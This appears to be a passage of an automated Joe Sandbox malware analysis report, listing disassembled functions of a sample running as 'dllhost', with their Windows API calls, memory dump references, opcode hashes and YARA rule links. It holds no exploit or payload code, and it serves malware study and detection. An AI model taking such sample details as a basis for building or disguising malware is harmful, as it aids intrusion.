                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                              • Instruction ID: 049d94eeec1c3219778d14f023c81a0d93a8da43d693805162a6c59e2ada833e
                                                                              • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                              • Instruction Fuzzy Hash: C8E0EC3221125AABDF10AF559C04EEB7B6CEF05760F048837F915E6150D631E8619BA4
                                                                              Function 00402348 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402379
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfileString
                                                                              • String ID:
                                                                              • API String ID: 1096422788-0
                                                                              • Opcode ID: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                                              • Instruction ID: 69d349e7d285c822079f9e4bf846872a9f1ef35916f06b7134f04da07b3971da
                                                                              • Opcode Fuzzy Hash: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                                              • Instruction Fuzzy Hash: 25E0487080420CAADB106FA1CE099BE7A64AF00340F104439F5907B0D1E6FC84415745
                                                                              Function 004060B9 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Open
                                                                              • String ID:
                                                                              • API String ID: 71445658-0
                                                                              • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                              • Instruction ID: 58905e2b4c491557ae101ac833ec4d98e5c4c38dddbb54ebc3676a7d29ad937b
                                                                              • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                              • Instruction Fuzzy Hash: 90D0123204020DBBDF119E90ED01FAB3B1DAB04750F014426FE16A5090D775D570AB14
                                                                              Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: 30cc171b591943f2be269f496ec4946c6c5ef3ac0631ee9b668c6a841e76ff0b
                                                                              • Instruction ID: 98fc1d19ac344296b2804d9baf38034e6035577dbf93b3ceff4c84e4d608f923
                                                                              • Opcode Fuzzy Hash: 30cc171b591943f2be269f496ec4946c6c5ef3ac0631ee9b668c6a841e76ff0b
                                                                              • Instruction Fuzzy Hash: 85D01272B04104DBDB21DBA4AF0859E72A59B10364B204677E101F11D1DAB989559A59
                                                                              Function 0040422D Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                                              • Instruction ID: d07d2c2d8c4880ed0075d79043221f50ab42e2b574db457b7482678080f727f2
                                                                              • Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                                              • Instruction Fuzzy Hash: 42C04C717402017BEA208B519D49F1677549790B40F1484797740E50E0D674E450D62C
                                                                              Function 00404216 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                                              • Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
                                                                              • Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                                              • Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19
                                                                              Function 004032F5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403303
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: FilePointer
                                                                              • String ID:
                                                                              • API String ID: 973152223-0
                                                                              • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                              • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                              • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                              • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                              Function 00404203 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • KiUserCallbackDispatcher.NTDLL(?,00403FDA), ref: 0040420D
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CallbackDispatcherUser
                                                                              • String ID:
                                                                              • API String ID: 2492992576-0
                                                                              • Opcode ID: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                                              • Instruction ID: cd7a90ca9096364f54c072f0977fd0b21683179c1f8a6313e809ce6865a57a73
                                                                              • Opcode Fuzzy Hash: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                                              • Instruction Fuzzy Hash: AFA01231100400ABCE124F50DF08C09BA31B7B43017104439A1400003086320420EB08
                                                                              Function 00401F00 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 004052B0: lstrlenW.KERNEL32(Completed,00000000,005A5ADC,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                                                • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Completed,00000000,005A5ADC,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                                                • Part of subcall function 004052B0: lstrcatW.KERNEL32(Completed,00403233,00403233,Completed,00000000,005A5ADC,00403094), ref: 0040530B
                                                                                • Part of subcall function 004052B0: SetWindowTextW.USER32(Completed,Completed,00000000,005A5ADC,00403094,?,?,?,?,?,?,?,?,?,00403233), ref: 0040531D
                                                                                • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                                                • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                                                • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                                                • Part of subcall function 00405831: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
                                                                                • Part of subcall function 00405831: CloseHandle.KERNEL32(?), ref: 00405867
                                                                              • CloseHandle.KERNEL32(?), ref: 00401F47
                                                                                • Part of subcall function 004066D7: WaitForSingleObject.KERNEL32(?,00000064), ref: 004066E8
                                                                                • Part of subcall function 004066D7: GetExitCodeProcess.KERNEL32(?,?), ref: 0040670A
                                                                                • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                              • String ID:
                                                                              • API String ID: 2972824698-0
                                                                              • Opcode ID: 665e09d7c53e364fc1df005af6411e0beff931482f0affcbd5e419fff00f5d35
                                                                              • Instruction ID: bab1dc3541612b80991091494b36371daed99366b6aa6fafa292830653d85492
                                                                              • Opcode Fuzzy Hash: 665e09d7c53e364fc1df005af6411e0beff931482f0affcbd5e419fff00f5d35
                                                                              • Instruction Fuzzy Hash: 95F09032905121EBCB21FBA18D8899E72A49F01328B2505BBF501F21D1C77D0E518AAE

                                                                              Non-executed Functions

                                                                              Function 00404C2C Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404C44
                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404C4F
                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404C99
                                                                              • LoadBitmapW.USER32 ref: 00404CAC
                                                                              • SetWindowLongW.USER32(?,000000FC,00405224), ref: 00404CC5
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404CD9
                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404CEB
                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404D01
                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D0D
                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D1F
                                                                              • DeleteObject.GDI32(00000000), ref: 00404D22
                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D4D
                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D59
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DEF
                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E1A
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2E
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404E5D
                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E6B
                                                                              • ShowWindow.USER32(?,00000005), ref: 00404E7C
                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404F79
                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404FDE
                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404FF3
                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405017
                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405037
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0040504C
                                                                              • GlobalFree.KERNEL32(?), ref: 0040505C
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004050D5
                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040517E
                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040518D
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004051AD
                                                                              • ShowWindow.USER32(?,00000000), ref: 004051FB
                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00405206
                                                                              • ShowWindow.USER32(00000000), ref: 0040520D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                              • String ID: $M$N
                                                                              • API String ID: 1638840714-813528018
                                                                              • Opcode ID: 53b2961380e6d72bc5a192face6fddd67d0e305c1ee816909df721ce3db20383
                                                                              • Instruction ID: 31f8c2f88752af3cc61dfe1620f9b722711d108b5774519bd23904c74dbe123e
                                                                              • Opcode Fuzzy Hash: 53b2961380e6d72bc5a192face6fddd67d0e305c1ee816909df721ce3db20383
                                                                              • Instruction Fuzzy Hash: BD0282B0A00209EFDB209F95DD85AAE7BB5FB44314F10417AF610BA2E1C7799D52CF58
                                                                              Function 0040437E Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040441C
                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404430
                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040444D
                                                                              • GetSysColor.USER32(?), ref: 0040445E
                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040446C
                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040447A
                                                                              • lstrlenW.KERNEL32(?), ref: 0040447F
                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040448C
                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044A1
                                                                              • GetDlgItem.USER32(?,0000040A), ref: 004044FA
                                                                              • SendMessageW.USER32(00000000), ref: 00404501
                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0040452C
                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040456F
                                                                              • LoadCursorW.USER32 ref: 0040457D
                                                                              • SetCursor.USER32(00000000), ref: 00404580
                                                                              • LoadCursorW.USER32 ref: 00404599
                                                                              • SetCursor.USER32(00000000), ref: 0040459C
